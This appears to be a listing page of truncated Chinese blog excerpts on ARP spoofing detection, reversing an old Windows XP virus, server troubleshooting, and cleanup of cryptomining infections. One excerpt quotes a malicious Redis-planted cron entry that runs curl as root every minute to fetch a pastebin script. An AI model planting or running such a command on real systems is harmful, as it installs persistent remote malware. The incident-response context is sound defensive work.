Xarp工具（高級ARP欺騙檢測工具）。 = 。=之前做實驗發現的一個工具，自己感覺用起來還不錯。突然 ...

ARP： 我們知道，網絡層和網絡層以上使用的是IP地址，但在實際網絡的鏈路上傳送數據幀時，數據包首先是被網卡接受到再去處理上層協議的，所以最終還是必須使用該網絡的硬件地址。但IP地址和下面的網絡的硬件地址之間由於格式不同而不存在簡單的映射關系 ...

0x00 前言 這個病毒應該是比較簡單的，別人給我的樣本，讓我幫忙看看，看樣子是很早的一個病毒，針對Windows XP系統的，行為分析很簡單，但是想着不能就僅僅分析關鍵點，要不就把整個結構給逆向出來，弄了兩天，搞的差不多了，簡單的記錄一下。 0x01 基本介紹 整個病毒是4個文件組成 ...

1. 問題描述：早上剛來上班，業務部門同事反應管理后台無法登錄 2. 問題排查定位 2.1 服務器排查 a. 接口是否可以調通：首先自己登陸后台，發現時好時壞，偶爾接口返回【系統忙】。我們系統接口異常調不通會返回系統忙 b. 服務是否死掉或者假死：連接服務器->查看Java ...

一、場景： 系統 Deepin 15；php 5.5.33；nginx 1.9.9 二、狀況： 簡單的頁面輸出正常（比如 phpinfo();），跑公司的任何一個項目，均502 三、排查 1、查詢各種日志，包括 nginx.error.log、php_error.log ...

起因 偶然間發現redis里有一個陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb ...

概述： 9.4號臨時接到通知讓一個人去應急，第一次應急，比較虛，到客戶那里了解了一下情況。主要現象是流量異常，CPU占用過高。 發現連接數超多-17779，然后在試圖連接其他主機的22端口 發現異常進程，當初進行殺死之后，從九點到晚上十點cpu都是正常的，然后上午通過查看日志last ...

背景 新接手了個環境，同事交接時說這些機器中過挖礦病毒還沒重裝，我TM。。。 線上環境不好動，只能手動查殺了。 操作系統如下： 過程 ssh上去，ps -ef看到如下： 手動kill掉進程，很快會生成新的，猜測有守護進程。用STOP信號讓它停止。 查看定時任務清理 ...